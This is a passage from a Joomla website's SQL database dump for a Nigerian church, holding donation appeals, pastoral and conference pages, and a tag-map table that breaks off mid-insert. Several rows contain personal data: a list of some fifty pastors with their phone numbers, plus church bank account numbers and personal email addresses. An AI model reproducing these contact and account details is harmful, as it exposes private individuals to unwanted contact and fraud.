Nigeria and the United Kingdom. Our goal is to distribute 1 million copies as soon as possible. Find your place in the vision by becoming a Spirit Meat partner today!</li>\r\n<li><strong>OMEGA CHAMPION SEED (N10,000 per month):</strong> This is the seed sown directly into the broadcast of the Living By the Answer on the Omega Television  based in South Africa. Most African countries are reached by the message, mission and mandate of the Dream Centre through this station. The Lord said everyone that partakes of the Omega Champion seed will be champions on the African continent.</li>\r\n<li><strong>SINGLE-HANDEDLY SPONSORING A SINGLE STATION:</strong>  Many couples and individuals are taking the partnership side of their lives more seriously than others and the truth is that whenever God gives an instruction that is in levels, the manifestation of the harvest is also in phases. SPONSORING A SINGLE STATION (i.e. paying all the expenses of the Broadcast of LBA or JOEW) IS THE HIGHEST STAGE IN PARTNERSHIP IN DC for now. Move yourself there. Urge your spouse to move your family there, or 6 of your friends can decide to do so from today and see the God of the Dream Centre commit to you on a higher level than you have ever known. God bless you.</li>\r\n</ul>\r\n<p><strong>2.    SELF-WILLED ASSIGNMENTS:</strong></p>\r\n<hr />\r\n<p>These are the financial assignments that God places in your heart personally. This does not have to be directed in church or raised by the pastor, but God is still in the business laying a critical seed on the heart of His sons and daughters. Open your heart to the moments when God places a seed in your heart. </p>\r\n<p><strong>ENLIST FOR PARTNERSHIP TODAY, MAY GOD DEPEND ON YOU!</strong></p>\r\n<p><strong style=\"font-size: 10pt;\">To be a partner of what God is doing in Life Oasis, call or text 08037252124 or send a mail to oyenikeareogun@yahoo.co.uk or lifeoasis@hotmail.com</strong></p>\r\n<p><strong style=\"font-size: 10pt;\">Account No : 0049302641     </strong></p>\r\n<p><strong style=\"font-size: 10pt;\">Account Name : Dream Centre Of The Life Oasis Int\'l Church</strong></p>\r\n<p><strong style=\"font-size: 10pt;\">Banker : Guaranty Trust Bank (GTB)</strong></p>\r\n<p><strong style=\"font-size: 10pt;\"> </strong></p>\r\n<p><strong style=\"font-size: 10pt;\">FOR SPIRIT MEAT</strong></p>\r\n<p><strong style=\"font-size: 10pt;\">Account No : 0049085560</strong></p>\r\n<p><strong style=\"font-size: 10pt;\">Account Name : SPIRIT MEAT</strong></p>\r\n<p><strong style=\"font-size: 10pt;\">Banker : Guaranty Trust Bank (GTB)</strong></p>\r\n<p> </p>', '', 1, 2, '2017-01-01 15:53:26', 196, '', '2017-05-02 23:52:27', 196, 0, '0000-00-00 00:00:00', '2017-01-01 15:53:26', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 3, 7, '', '', 1, 6059, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(123, 362, 'Monthly Bible Reading', 'monthly-bible-reading', '<p><img src=\"images/april.png\" alt=\"\" /></p>', '', 1, 2, '2017-01-08 18:55:20', 196, '', '2017-04-17 19:19:26', 196, 0, '0000-00-00 00:00:00', '2017-01-08 18:55:20', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 4, 6, '', '', 1, 1103, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(124, 364, 'Partnership Application', 'application', '<p>{jumi[*8]}</p>', '', 1, 2, '2017-02-26 06:42:52', 196, '', '2017-02-26 06:49:28', 196, 0, '0000-00-00 00:00:00', '2017-02-26 06:42:52', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 4, 5, '', '', 1, 872, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(125, 367, 'Private Streaming', 'private', '<p>{jumi[*10]}</p>', '', 1, 2, '2017-03-10 20:23:26', 196, '', '2017-03-10 20:24:51', 196, 0, '0000-00-00 00:00:00', '2017-03-10 20:23:26', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 3, 4, '', '', 1, 52302, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(126, 369, 'Pastoral Training', 'pastoral-training', '<p>{jumi[*11]}</p>', '', 1, 2, '2017-03-24 20:01:00', 196, '', '2017-03-24 20:22:42', 196, 0, '0000-00-00 00:00:00', '2017-03-24 20:01:00', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 5, 3, '', '', 1, 26133, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(127, 372, 'Dream Centre Ordained Pastors (3)', 'ordained-pastor-3', '<p>[list style=\"uk-list-striped\"]</p>\r\n<p>[li]Pastor Samuel Binuomote - 08033879828[/li]</p>\r\n<p>[li]Pastor Charles Abiona - 08034756335[/li]</p>\r\n<p>[li]Pastor Soji OLOYEDE - 08064463869[/li]</p>\r\n<p>[li]Pastor Seun Akinyemi - 08035772770[/li]</p>\r\n<p>[li]Pastor Seun Kolapo - 08033856075[/li]</p>\r\n<p>[li] Pastor Gbenga Abe - 07031846832[/li]</p>\r\n<p>[li]Pastor Lekan AWE - 08036207471[/li]</p>\r\n<p>[li]Pastor Sogo Adediran - +447508782839[/li]</p>\r\n<p>[li]Pastor Lekan Ojo - 08062283308[/li]</p>\r\n<p>[li]Pastor Dayo Owoeye - +447947923893[/li]</p>\r\n<p>[li]Pastor Biodun Akinyemi - +447411810572[/li]</p>\r\n<p>[li]Asst. Pastor Kunle OMOOTEMI - 08060072878[/li]</p>\r\n<p>[li]Asst. Pastor Tobi Adewuyi - 07031045345[/li]</p>\r\n<p>[li]Asst. Pastor Ife OMONIJO - 07062825734[/li]</p>\r\n<p>[li]Asst. Pastor Olatunde OLAJOLO - 08028582269 &amp; 08038492153[/li]</p>\r\n<p>[li]Asst. Pastor Yinka OYAYODE - 08035147968[/li]</p>\r\n<p>[li]Asst. Pastor Kayode Odewunmi - 07060930809[/li]</p>\r\n<p>[li]Asst. Pastor Tunji ADEDOKUN -08035276969[/li]</p>\r\n<p>[li]Asst. Pastor Ibukun ADEBAYO - 07038548230[/li]</p>\r\n<p>[li]Asst. Pastor Deji OGUNGBEMI - 08033506866[/li]</p>\r\n<p>[li]Asst. Pastor Sunday ISRAEL - 08065798140[/li]</p>\r\n<p>[li]Asst. Pastor Tolu OYEWO - 07031382171[/li]</p>\r\n<p>[li]Asst. Pastor Adeola   MUSA - 08032225880[/li]</p>\r\n<p>[li]Asst. Pastor Olabode - 08031300861[/li]</p>\r\n<p>[li]Asst. Pastor OLAYEMI - 07031557952[/li]</p>\r\n<p>[li]Asst. Pastor David Ojo - 08066106033[/li]</p>\r\n<p>[li]Asst. Pastor Olaolu Oniya - 08065320267[/li]</p>\r\n<p>[li]Asst. Pastor kayode Olorunnisola - 08038539450[/li]</p>\r\n<p>[li]Asst. Pastor Anthony Olasinde - 0803 223 3948[/li]</p>\r\n<p>[li]Asst. Pastor Femi SARUMI - 08060165216[/li]</p>\r\n<p>[li]Asst. Pastor Niyi SOBOWALE - 08035352110[/li]</p>\r\n<p>[li]Asst. Pastor Toba ABE - 07034153461[/li]</p>\r\n<p>[li]Asst. Pastor Oloyede - 07069766796[/li]</p>\r\n<p>[li]Asst. Pastor Joel Akinkunmi - [/li]</p>\r\n<p>[li]Asst. Pastor Niyi AKINDOYIN - 08037276316[/li]</p>\r\n<p>[li]Asst. Pastor Wale Olansebe - 08038720908,07034129416 &amp; 08105434047[/li]</p>\r\n<p>[li]Asst Pastor Tunde Ogunkoya - 07064335373[/li]</p>\r\n<p>[li]Asst. Pastor Segun ADETUNJI - 07041838990 &amp; 07027950907[/li]</p>\r\n<p>[li]Asst. Pastor Muyiwa OLATUNJI - 08053047866 &amp; 08084351078[/li]</p>\r\n<p>[li]Asst Pastor Enitan Egbeyemi- 08033878871[/li]</p>\r\n<p>[li]Asst Pastor Dayo Afolabi - 08036533484[/li]</p>\r\n<p>[li]Asst Pastor Seyi Oluwatuyi - 08056596102[/li]</p>\r\n<p>[li]Asst Pastor David Alabi - 08037608645[/li]</p>\r\n<p>[li]Asst Pastor Demola Adekanmi - 08033544856[/li] </p>\r\n<p>[li]Asst. Pastor Niyi Adenuga - 08112645950[/li]</p>\r\n<p>[li]Asst. Pastor Samuel Olalere - 08107056220[/li]</p>\r\n<p>[li]Asst. Pastor Ibikunle Cleopas - 08060135726[/li]</p>\r\n<p>[li]Asst Pastor kehinde Odeniyi - +447587840610[/li] </p>\r\n<p>[li]Asst. Pastor Lanre Morenikeji - 08033612523[/li] </p>\r\n<p>[li]Asst. Pastor Tomiwa AKINTUNDE - 07062650892,08189078093[/li]</p>\r\n<p>[li]Asst. Pastor (Mrs) Binuomote - 08035635575[/li]</p>\r\n<p>[li]Asst. Pastor(Mrs) Yemisi Shobowale - 08033049996[/li]</p>\r\n<p>[li]Pastor Joshua Areogun[/li]</p>\r\n<p>[/list]</p>', '', 0, 37, '2016-09-01 10:37:42', 196, '', '2017-05-03 02:42:01', 0, 0, '0000-00-00 00:00:00', '2016-09-01 10:37:42', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 1, 0, '', '', 1, 24, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(128, 373, 'GOBC 2017 Online Registration', '2017', '<p>GOBC 2017 Registration continues at the convention Venue; Dream Centre Headquarters, Km. 4 Gbongan-Osogbo Express Way, Dream Centre Bus stop Osogbo, Nigeria. For further enquries: Please contact +2348038492153. For Online Church please call: +447342770397.</p>\r\n<article>\r\n<p>— Thank you</p>\r\n<p> </p>\r\n<p> </p>\r\n</article>', '', 0, 2, '2017-06-11 16:23:01', 196, '', '2017-06-25 15:29:57', 196, 0, '0000-00-00 00:00:00', '2017-06-11 16:23:01', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 6, 2, '', '', 1, 941, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(129, 387, '35 years of heeding the call', '35-years-of-heeding-the-call', '<p><img src=\"images/anniv2018.png\" alt=\"\" width=\"741\" height=\"445\" /></p>', '', 1, 2, '2018-05-09 10:45:22', 196, '', '2018-05-09 11:19:41', 196, 0, '0000-00-00 00:00:00', '2018-05-09 10:45:22', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 2, 1, '', '', 1, 179, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(130, 396, 'Instructions for Online Registration and Check-in for School of the Calling', 'soc2019', '<p><span style=\"font-size: 12pt;\"><strong>UPDATED INSTRUCTION FOR REGISTRATION AND DAILY ATTENDANCE CHECK-IN FOR SCHOOL OF THE CALLING 2019</strong></span></p>\r\n<p><em><strong>NOTE: DAILY ATTENDANCE CHECK-IN will be active only from 12:00 am to 6:15 am</strong></em></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>STEP 1:</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Register FREE at: <a href=\"https://www.solaareogunministries.org/soc2019\" target=\"_blank\" rel=\"noopener\">https://www.solaareogunministries.org/soc2019</a>&nbsp; only once.&nbsp;This is compulsory.</span></p>\r\n<p><span style=\"font-size: 12pt;\"></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>STEP 2:</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>a. Check-in from a browser:</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Visit&nbsp;<a href=\"https://cloud.i-attend.com/SelfCheck/\" target=\"_blank\" rel=\"noopener\">https://cloud.i-attend.com/SelfCheck/</a>&nbsp;</span></p>\r\n<p><span style=\"font-size: 12pt;\">Enter the following information:</span></p>\r\n<ul>\r\n<li><span style=\"font-size: 12pt;\"><strong>Organization ID:</strong> LIFEOASIS</span></li>\r\n<li><strong style=\"font-size: 12pt; background-color: inherit; color: inherit; font-family: inherit; font-style: inherit; font-variant-ligatures: inherit; font-variant-caps: inherit;\">Email Address:</strong><span style=\"font-size: 12pt; background-color: inherit; color: inherit; font-family: inherit; font-style: inherit; font-variant-ligatures: inherit; font-variant-caps: inherit; font-weight: inherit;\"> same as you used for online registration in step 1</span></li>\r\n<li><span style=\"font-size: 12pt;\"><strong>Daily Self Check-in Event PIN:* </strong>Will be communicated to you by your Pastor 12 hours before the next day<strong>.&nbsp;</strong></span><span style=\"font-size: 12pt;\"><strong><strong style=\"font-size: 12pt; background-color: inherit; color: inherit; font-family: inherit; font-style: inherit; font-variant-ligatures: inherit; font-variant-caps: inherit;\">Ministry Sons and online Members can join this WhatsApp group for their daily attendance check-in&nbsp; PIN:&nbsp;<a href=\"https://chat.whatsapp.com/GeQFLwNjsALFIlbd6KxBTX\">https://chat.whatsapp.com/GeQFLwNjsALFIlbd6KxBTX</a></strong><em style=\"font-size: 12pt; background-color: inherit; color: inherit; font-family: inherit; font-variant-ligatures: inherit; font-variant-caps: inherit; font-weight: inherit;\"><span style=\"text-decoration: underline;\"></span></em><span style=\"font-size: 12pt;\"></span></strong></span></li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 12pt;\"><strong>b. Check-in using Mobile App:&nbsp;</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Download the “i-Attend Self Check-in” app using the details below:</span></p>\r\n<ul>\r\n<li><span style=\"font-size: 12pt;\"><strong>Android Phones</strong> -&nbsp;<a href=\"https://play.google.com/store/apps/details?id=com.tnetic.iselfcheck\" target=\"_blank\" rel=\"noopener\">https://play.google.com/store/apps/details?id=com.tnetic.iselfcheck</a></span></li>\r\n<li><span style=\"font-size: 12pt;\"><strong>iPhones</strong> -&nbsp;&nbsp;<a href=\"https://itunes.apple.com/US/app/id1421201302?mt=8\" target=\"_blank\" rel=\"noopener\">https://itunes.apple.com/US/app/id1421201302?mt=8</a>&nbsp;</span></li>\r\n</ul>\r\n<p><span style=\"font-size: 12pt;\">After you’ve downloaded the app, CLICK ON: “ENTER EVENT PIN” at the bottom right.&nbsp;</span><span style=\"font-size: 12pt;\">Enter the following information:</span></p>\r\n<ul>\r\n<li><span style=\"font-size: 12pt;\"><strong>Organization ID:</strong> LIFEOASIS</span></li>\r\n<li><span style=\"font-size: 12pt;\"><strong>Daily Self Check-in Event PIN:&nbsp;</strong>Will be communicated to you by your Pastor 12 hours before the next day<strong>. <strong><strong style=\"font-size: 12pt; background-color: inherit; color: inherit; font-family: inherit; font-style: inherit; font-variant-ligatures: inherit; font-variant-caps: inherit;\">Ministry Sons and online Members can join this WhatsApp group for their daily attendance check-in&nbsp; PIN:&nbsp;<a href=\"https://chat.whatsapp.com/GeQFLwNjsALFIlbd6KxBTX\">https://chat.whatsapp.com/GeQFLwNjsALFIlbd6KxBTX</a></strong><em style=\"font-size: 12pt; background-color: inherit; color: inherit; font-family: inherit; font-variant-ligatures: inherit; font-variant-caps: inherit; font-weight: inherit;\"><span style=\"text-decoration: underline;\"></span></em><span style=\"font-size: 12pt;\"></span></strong><span style=\"font-size: 12pt;\"></span></strong></span></li>\r\n<li><span style=\"font-size: 12pt;\"><strong>Email Address / Username:</strong> same as you used for online registration in step 1</span></li>\r\n</ul>\r\n<p><span style=\"font-size: 12pt;\"></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>STEP 3 (only for those attending on-ground in a DC Branch)</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">After you’ve downloaded the app as explained in step 2b above, open the app and CLICK ON: <strong>“SCAN &amp; CHECK-IN”.</strong> Use the Camera of your phone to Scan the QR CODE provided in your respective branches.&nbsp;</span></p>\r\n<p><span style=\"font-size: 12pt;\"></span></p>\r\n<p><strong><span style=\"font-size: 12pt;\">STEP 4</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"></span><span style=\"font-size: 12pt;\">Should in case you encounter any challenges with your registration, kindly visit the registration stand at your respective branches for assistance or call +2347062930768, +2348037608645, +2348066985638,</span></p>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 12pt;\"><em><strong>NOTE: NOTE: Daily Registration will be active from 12:00am to 6:20am</strong></em></span></p>\r\n<p>&nbsp;</p>\r\n<p><em><span style=\"font-size: 12pt;\">You must check-in for your attendance daily.</span></em></p>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 12pt;\">Welcome again to School of the Calling 2019</span></p>\r\n<p><span style=\"font-size: 12pt;\"></span></p>', '', 1, 2, '2019-05-01 06:08:23', 196, '', '2019-05-01 11:45:08', 196, 0, '0000-00-00 00:00:00', '2019-05-01 06:08:23', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 35, 0, '', '', 1, 1177, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', '');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_contentitem_tag_map`
--

CREATE TABLE `y57u5_contentitem_tag_map` (
  `type_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `core_content_id` int(10) UNSIGNED NOT NULL COMMENT 'PK from the core content table',
  `content_item_id` int(11) NOT NULL COMMENT 'PK from the content type table',
  `tag_id` int(10) UNSIGNED NOT NULL COMMENT 'PK from the tag table',
  `tag_date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'Date of most recent save for this tag-item',
  `type_id` mediumint(8) NOT NULL COMMENT 'PK from the content_type table'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Maps items from content tables to tags';

--
-- Dumping data for table `y57u5_contentitem_tag_map`
--

INSERT INTO `y57u5_contentitem_tag_map` (`type_alias`, `core_content_id`, `content_item_id`, `tag_id`, `tag_date`, `type_id`) VALUES
('com_content.article', 2, 5, 6, '2014-07-26 07:20:01', 1),
('com_content.article', 2, 5, 7, '2014-07-26 07:20:01', 1),
('com_content.article', 2, 5, 8, '2014-07-26 07:20:01', 1),
('com_content.article', 2, 5, 9, '2014-07-26 07:20:01', 1),
('com_content.article', 2, 5, 10, '2014-07-26 07:20:01', 1),
('com_content.article', 3, 9, 2, '2014-07-26 07:07:25', 1),
('com_content.article', 3, 9, 7, '2014-07-26 07:07:25', 1),
('com_content.article', 3, 9, 8, '2014-07-26 07:07:25', 1),
('com_content.article', 3, 9, 9, '2014-07-26 07:07:25', 1),
('com_content.article', 3, 9, 11, '2014-07-26 07:07:25', 1),
('com_content.article', 4, 11, 7, '2014-08-09 07:29:53', 1),
('com_content.article', 4, 11, 8, '2014-08-09 07:29:53', 1),
('com_content.article', 4, 11, 9, '2014-08-09 07:29:53', 1),
('com_content.article', 4, 11, 10, '2014-08-09 07:29:53', 1),
('com_content.article', 4, 11, 12, '2014-08-09 07:29:53', 1),
('com_content.article', 4, 11, 13, '2014-08-09 07:29:53', 1),
('com_content.article', 1, 13, 2, '2015-06-23 07:15:40', 1),
('com_content.article', 1, 13, 3, '2015-06-23 07:15:40', 1),
('com_content.article', 1, 13, 4, '2015-06-23 07:15:40', 1),
('com_content.article', 1, 13, 5, '2015-06-23 07:15:40', 1),
